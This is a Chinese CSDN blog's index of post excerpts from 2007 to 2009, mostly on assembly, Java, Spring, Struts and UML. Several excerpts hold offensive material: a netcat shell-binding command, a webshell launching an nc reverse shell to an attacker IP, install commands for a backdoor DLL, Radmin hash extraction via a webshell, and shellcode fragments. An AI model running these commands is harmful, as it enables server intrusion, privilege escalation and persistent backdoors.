kingwrcy-CSDN博客

原创王爽汇编语言的设计一.

这个设计花了我3天时间噢..哎.毕竟刚学汇编.脑子笨了点.不过好歹熬过来了..贴出代码.备忘. 先附上运行结果: assume cs:codedata segment db 1975,1976,1977,1978,1979,1980,1981,1982,1983 db 1984,1985,1986,1987,

2009-04-16 09:41:00 929 1

原创 ubb代码简介

什么是UBB代码？ UBB代码是HTML的一个变种,是Ultimate Bulletin Board (国外的一个BBS程序)采用的一种特殊的TAG。您也许已经对它很熟悉了。UBB代码很简单，功能很少，但是由于其Tag语法检查实现非常容易，所以我们的网站引入了这种代码，以方便网友使用显示图片/联接/加粗字体等常见功能。 UBB代码可以实现那些HTML的功能，及它的使用例子和技巧？1.有

2008-03-26 16:48:00 445

转载用端口截听实现隐藏嗅探与攻击

在WINDOWS的SOCKET服务器应用的编程中，如下的语句或许比比都是：　　s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); 　　saddr.sin_family = AF_INET; 　　saddr.sin_addr.s_addr = htonl(INADDR_ANY); 　　bind(s,(SOCKADDR *)&saddr,sizeof(

2008-02-14 18:56:00 470

临界区　　临界区（Critical Section）是一段独占对某些共享资源访问的代码，在任意时刻只允许一个线程对共享资源进行访问。如果有多个线程试图同时访问临界区，那么在有一个线程进入后其他所有试图访问此临界区的线程将被挂起，并一直持续到进入临界区的线程离开。临界区在被释放后，其他线程可以继续抢占，并以此达到用原子方式操作共享资源的目的。　　临界区在使用时以CRITICAL_SECTION结构对

2008-02-12 19:10:00 1158

原创管理事件内核对象

管理事件内核对象　　在前面讲述线程通信时曾使用过事件内核对象来进行线程间的通信，除此之外，事件内核对象也可以通过通知操作的方式来保持线程的同步。对于前面那段使用临界区保持线程同步的代码可用事件对象的线程同步方法改写如下： // 事件句柄HANDLE hEvent = NULL;// 共享资源 char g_cArray[10];……UI

2008-02-12 19:10:00 444

原创　互斥内核对象

互斥内核对象　　互斥（Mutex）是一种用途非常广泛的内核对象。能够保证多个线程对同一共享资源的互斥访问。同临界区有些类似，只有拥有互斥对象的线程才具有访问资源的权限，由于互斥对象只有一个，因此就决定了任何情况下此共享资源都不会同时被多个线程所访问。当前占据资源的线程在任务处理完后应将拥有的互斥对象交出，以便其他线程在获得后得以访问资源。与其他几种内核对象不同，互斥对象在操作系统中拥有特殊代码，并

2008-02-12 19:08:00 512

原创信号量内核对象

信号量内核对象　　信号量（Semaphore）内核对象对线程的同步方式与前面几种方法不同，它允许多个线程在同一时刻访问同一资源，但是需要限制在同一时刻访问此资源的最大线程数目。在用CreateSemaphore（）创建信号量时即要同时指出允许的最大资源计数和当前可用资源计数。一般是将当前可用资源计数设置为最大资源计数，每增加一个线程对共享资源的访问，当前可用资源计数就会减1，只要当前可用资源计数

2008-02-12 18:47:00 426

转载给右键菜单加入CMD命令行快速通道

很多人都很喜欢在CMD命令行下来操作计算机，我也是其中之一。如何快速打开CMD并且定位到指定的路径呢？很多优化软件（比如优化大师）都提供了往右键菜单中加入“CMD快速通道”的功能，当右键点击文件夹时，就打开CMD并定位到该文件夹。网上也有修改注册表来实现的，其实根本不用这么麻烦。打开“我的电脑”，点击菜单中的“工具”－“文件夹选项”，选择“文件类型”，找到“(无)资料夹”，点“高级”，

2008-02-12 15:30:00 944

转载 nc提权

环境说明： Server-U 不可利用 pcAnywhere没有安装提权思路: 上传NC，进行反弹连接。命令说明：nc -l -p 110 -t -e c:/winnt/system32/cmd.exe-l 监听本地入栈信息-p port 打开本地端口-t 以telnet形式应答入栈请求-e 程序重定向C:/RECYCLER/cmd.exeC:/RECYCLER/nc -l -p 1

2008-02-12 13:09:00 736

原创解除TCP/IP限制的方法

1.用NC反弹得到一个shell 本机监听 NC -l -p 32 WEBSHELL运行： x:/xxx/serv-u.exe "x:/xxx/nc.exe -e cmd.exe *.*.*.* port" 得到一个shell 2.CMD下导出注册表文件 C:/>regedit -e x:/xxx/1.reg HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001/Ser

2008-02-12 13:08:00 492

转载反汇编破解Radmin密码实例

一个webshell 最好有读取注册表的权限如果不能读取radmin注册表至少wscript.shell组件没删这样我们可 ...一个webshell 最好有读取注册表的权限如果不能读取radmin注册表至少wscript.shell组件没删这样我们可以调用cmd 导出radmin的表值 radmin的注册表值也就是经过加密的MD5 hash值是32位哦比如 radmin的注册表里

2008-02-04 21:20:00 608

原创 NameLess BackDoor

使用方法：安装1.将NameLess.dll(可以改名)上传到任意目录(最好是在系统目录:%winnt%/system32目录中)2.打开CMD窗口,转到后门放置的目录,输入安装命令:Rundll32 NameLess.dll,Install卸载命令:Rundll32 NameLess.dll,Remove 158352692注意下：命令区分大小写...自己测试时候没注意到...浪费了点时间...

2008-02-04 21:13:00 432

转载命令行下装WinPcap

WinPcap是个很常用的工具，但必须在窗口界面下安装。在网上也可以找到不用GUI的版本（但还是有版权页），其实我们完全可以自己做一个。以WinPcap 3.0a 为例。通过比较安装前后的文件系统和注册表快照，很容易了解整个安装过程。除去反安装的部分，关键的文件有三个：wpcap.dll，packet.dll和npf.sys。前面两个文件位于system32目录下，第三个在system 32

2008-02-04 19:06:00 354

转载 Spring发邮件

这次来看看Spring提高的一些有用过的JEE中使用到的功能,如发送Email, 执行定时任务... 先来看看发送Email吧, 在Spring中发送Email是很简单的,使用Spring提高的MailSender和MailMessage就可以了,配置代码如下: xml version="1.0" encoding="UTF-8" >DOCTYPE beans PUBLIC "-//SPRING

2008-01-22 17:50:00 361

转载用 Spring 更好地处理 Struts 动作三种整合 Struts 应用程序与 Spring 的方式

为什么 Spring 这么了不起？Spring 的创立者 Rod Johnson 以一种批判的眼光看待 Java™ 企业软件开发，并且提议很多企业难题都能够通过战略地使用 IOC 模式（也称作依赖注入）来解决。当 Rod 和一个具有奉献精神的开放源码开发者团队将这个理论应用于实践时，结果就产生了 Spring 框架。简言之，Spring 是一个轻型的容器，利用它可以使用一个外部 XML 配置文

2008-01-18 13:54:00 326

原创什么是Firebug

本文最初发表《程序员》杂志第三期，现将全文贴上，内容已经过编辑修饰了很多:)什么是Firebug从事了数年的Web开发工作，越来越觉得现在对WEB开发有了更高的要求。要写出漂亮的HTML代码；要编写精致的CSS样式表展示每个页面模块；要调试javascript给页面增加一些更活泼的要素；要使用Ajax给用户带来更好的体验。一个优秀的WEB开发人员需要顾及更多层面，才能交出一份同样优秀的作业

2008-01-17 13:26:00 353

转载 Ext2.0学习入门

本教程适用于Ext 2.0的版本，而版本1.x仍可找到。无论你是Ext库的新手，抑或是想了解Ext的人，本篇文章的内容都适合你。本文将简单地介绍Ext的几个基本概念，和如何快速地做出一个动态的页面并运行起来，假设读者已具备了一些JavaScript经验和简单了解HTML的文档对象模型（document object model ，DOM）。下载Ext如果你未曾下载过，那应从官方

2008-01-17 13:03:00 1235 1

原创程序员老鸟忠告:别把一辈子搭在技术上

我现在是自己做，但我此前有多年在从事软件开发工作，当回过头来想一想自己，觉得特别想对那些初学JAVA/DOT。NET技术的朋友说点心里话，希望你们能从我们的体会中，多少受点启发(也许我说的不好，你不赞同但看在我真心的份上别扔砖头啊).　　一。在中国你千万不要因为学习技术就可以换来稳定的生活和高的薪水待遇，你千万更不要认为哪些从事市场开发，跑腿的人，没有前途。　不知道你是不

2008-01-09 13:28:00 620 1

原创一个北京IT员工的真实写照

北京的互联网环境是最好的，当然北京的网站也是最多的，比上海，比深圳还要多，上海充其量网游发达些，再能数来的有名气的没几家，广州深圳就更不用说了。所以，像我这样的人，那里风大，往那里跑，终究从上海跑到北京，成为北漂中的一员，当然我不喜欢北漂这个词，但也得跟随大众。终于，我得拍着胸部说，我在北京，是搞IT的！话说出来，自己其实脸上害臊的很，真的！倘若你在中关村附近的大排档喝点小酒，周围坐的人，仔细一听

2008-01-09 13:25:00 683

转载 java读写文件- -

java读文件 /* Readfile.java 读取文件的内容，并将原样输出至屏幕上使用方法：java Readfile 文件名 */ import java.io.*; public class Readfile { public static void main(String[] args) { byte[] buff = new byte[1024]; boolean cont

2008-01-02 11:31:00 366

转载 JAVA相关基础知识(面试常用)

JAVA相关基础知识1、面向对象的特征有哪些方面 1.抽象：抽象就是忽略一个主题中与当前目标无关的那些方面，以便更充分地注意与当前目标有关的方面。抽象并不打算了解全部问题，而只是选择其中的一部分，暂时不用部分细节。抽象包括两个方面，一是过程抽象，二是数据抽象。2.继承：继承是一种联结类的层次模型，并且允许和鼓励类的重用，它提供了一种明确表述共性的方法。对象的一个新类可以从现

2008-01-02 11:30:00 625

转载 MASM32新手指南

如果你在用汇编语言来开发windows下的程序的话，MASM32是很好的选择。（Masm32下载地址请用google搜索罢。）工欲善其事，必先利其器。本文主要针对masm32 v8来说明三点：1、基本使用方法如何在MASM32中建立、汇编、链接源程序文件和运行生成的可执行文件。2、如何开启MASM32的在线帮助功能3、汉化QEDITOR菜单一、基本使用方法以在C:/PWIN951/TEMP文件夹下

2007-12-21 15:50:00 717

转载用例建模指南

用例(Use Case)是一种描述系统需求的方法，使用用例的方法来描述系统需求的过程就是用例建模。用例方法最早是由Iva Jackboson博士提出的，后来被综合到UML规范之中，成为一种标准化的需求表述体系。用例的使用在RUP中被推崇备至，整个RUP流程都被称作是"用例驱动"(Use-Case Driven)的，各种类型的开发活动包括项目管理、分析设计、测试、实现等都是以系统用例为主要输入工件，

2007-12-20 10:47:00 441

转载初学UML之-------用例图

一．UML简介UML（统一建模语言，Unified Modeling Language）是一种定义良好、易于表达、功能强大且普遍适用的可视化建模语言。它融入了软件工程领域的新思想、新方法和新技术。它的作用域不限于支持面向对象的分析与设计，还支持从需求分析开始的软件开发的全过程。在系统分析阶段，我们一般用UML来画很多图，主要包括用例图、状态图、类图、活动图、序列图、协作图、构建图、配

2007-12-20 10:34:00 674

转载 ActionServlet类

ActionServlet 类对应的类名为org.apche.struts.action.ActionServlet，它是struts框架的核心控制器组件，所有用户的请求都先由ActionServlet来处理，然后再由ActionServlet把请求转发给其他组件。Struts只允许一个应用中配置一个 ActionServlet，但是可以将ActionServlet扩展。Servlet容器在启动时

2007-12-20 10:22:00 307

转载 java基础知识

关于BS结构(浏览器-服务器结构)、HTTP基本原理等基础知识相信大家比我清楚，我就不废话了。不知道的同学去google一下。什么是Servlet和JSP用Java开发Web应用程序时用到的技术主要有两种，即Servlet和JSP。 Servlet是在服务器端执行的Java程序，一个被称为Servlet容器的程序（其实就是服务器）负责执行Java程序。而JSP(Java Server Pa

2007-12-20 10:10:00 340

转载 Servlet介绍

Servlet是用Java编写的Server端程序，它与协议和平台无关。Servlet运行于Java－enabled Web Server中。Java Servlet可以动态地扩展Server的能力，并采用请求－响应模式提供Web服务。　　最早支持Servlet技术的是JavaSoft的Java Web Server。此后，一些其它的基于Java的Web Server开始支持标准的Servle

2007-12-20 10:06:00 289

转载什么是MVC(三层架构)

模型－视图－控制器（MVC）是Xerox　PARC在八十年代为编程语言Smalltalk－80发明的一种软件设计模式，至今已被广泛使用。最近几年被推荐为Sun公司J2EE平台的设计模式，并且受到越来越多的使用 ColdFusion 和 PHP 的开发者的欢迎。模型－视图－控制器模式是一个有用的工具箱，它有很多好处，但也有一些缺点。MVC如何工作 MVC是一个设计模式，它强制性的使应

2007-12-20 10:01:00 458

转载打造Windows下自己的ShellCode

为了帮助初学者了解ShellCode的编写，并能一步一步操作得到自己的ShellCode，因此将Windows下ShellCode的编写过程作详细的介绍，以利于像我一样的菜鸟，最终能够写出简单的但却是真实的ShellCode；而进一步高级的ShellCode的编写，也会在系列后面的文章中一步一步的演示的，希望大家会发现，Exp真好，ShellCode最美妙！ ShellCode简介和编写

2007-12-19 12:53:00 1683 2

转载轻松将jmp esp方式改写为jmp ebx方式

转载：Q版黑客溢出教程一书写这篇文章，希望能给想我一样的初学缓冲区溢出的菜鸟一些帮助，因为到现在的确还没找到介绍这类的文章。首先，介绍在堆栈溢出中，我们的两种利用方式—jmp esp和jmp ebx；接下来，说明了其转化的简单方法；最后给了两个实际例子，将isno写的.printer利用代码和flashsky写的RPC利用代码改写成jmp ebx的方式，以实现对win2000 sp0-sp4全版本

2007-12-18 15:15:00 504

转载利用异常处理执行shellcode实例

在《Q版缓冲区溢出教程》中有一个例子，如下：#include #include char name[] = "/x41/x41/x41/x41" //name[0] - name[3] "/x41/x41/x41/x41" //name[4] - name[7] "/x41/x41/x41/x41" //ebp"/x12/x45/xfa/x7f"

2007-12-18 15:10:00 355

转载浅谈javascript函数劫持

创建时间：2007-12-02文章属性：原创文章提交：hkluoluo (luoluonet_at_hotmail.com)by luoluo on 2007-11-30luoluonet_at_yahoo.cnhttp://www.ph4nt0m.org一、概述javascript函数劫持，也就是老外提到的javascript hijacking技术。最早还是和剑心同学讨论问题时偶然看到的一段代

2007-12-18 15:02:00 268

转载总结windows下堆溢出的三种利用方式

main (int argc, char *argv[]) { char *buf1, *buf2; char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/x03/x00/x05/x00/x00/x01/x08/x00/x11/x11/x11/x11/x21/x21/x21/x21";buf1 = (char*)malloc (32); /* 分配两块内存

2007-12-18 14:50:00 324

转载利用SEH执行shellcode

作者：czy 主页：http://www.nsfocus.com日期：2003-08-06利用SEH执行shellcode czy 于 03.07.31前言唉时间过得真快啊一眨眼就过了三天,还是继续吧.今天介绍SEH,其实这东东我以前就用得实在不多,好不废话了大家首先要明白,如果要攻击一个有洞洞的程序并利用程序中的SEH来执行我们的shelloc

2007-12-18 14:47:00 598

转载当无法使用ESP定律时——EBP的妙用

堆栈是一种简单的数据结构，是一种只允许在其一端进行插入或删除的线性表。允许插入或删除操作的一端称为栈顶，另一端称为栈底，对堆栈的插入和删除操作被称入栈和出栈。有一组CPU指令可以实现对进程的内存实现堆栈访问。其中，POP指令实现出栈操作，PUSH指令实现入栈操作。CPU的ESP寄存器存放当前线程的栈顶指针，EBP寄存器中保存当前线程的栈底指针。CPU的EIP寄存器存放下一个CPU指令存放的内存地址

2007-12-17 16:13:00 420

转载简单反汇编阅读（四）

简单反汇编阅读（四）上次我们看过了if等的判断分支的语句，今天开始进入由反汇编写出反C代码由于水平有限，而且动画定位于初学者，所以动画会显得有点唠叨，请各位多多包涵------------------------------------------------------------------------------看下面debug版本的反汇编代码，我已经删掉源代码了，所以只能靠我们自己写出来0

2007-12-16 05:57:00 1084

转载简单反汇编阅读（五）

简单反汇编阅读（五）上次我们尝试了从不知道源码的情况下写出反C代码，今天我们不妨来点更难的算法而且是OD实战release发行版的代码由于水平有限，而且动画定位于初学者，所以动画会显得有点唠叨，请各位多多包涵------------------------------------------------------------------------------在实战代码前，我们先看看数组的反汇编

2007-12-16 05:57:00 671

转载简单反汇编阅读（三）

简单反汇编阅读（三）上次我们看了for循环的反汇编，今天我们来看看if等的判断分支的语句由于水平有限，而且动画定位于初学者，所以动画会显得有点唠叨，请各位多多包涵---------------------------------------------------------------------------

2007-12-16 05:56:00 589

转载简单反汇编阅读（二）

简单反汇编阅读（二）上一个动画我们已经知道了函数反汇编后最基本的调用过程，今天我们来看看复杂一点的函数由于水平有限，而且动画定位于初学者，所以动画会显得有点唠叨，请各位多多包涵--------------------------------------------------------------------

2007-12-16 05:55:00 582

转载简单反汇编阅读(1)

《简单反汇编阅读》是我学习了《天书夜读》后写的心得，并做成了动画，也可以说是我看《天书夜读》的读书笔记吧。我贴出文本，然后提供动画的下载地址，希望对还没入门的兄弟有所帮助，也希望高手能指出我的不足。大家好,我是 BoXer ,今天为大家做的动画是《简单反汇编阅读（一）》这类的文章是不少，但是动画好像很少，那我做一个抛砖引玉吧。由于水平有限，而且动画定位于初学者，所以动画会显得有点唠叨，请各位多多

2007-12-16 05:54:00 1271

空空如也

空空如也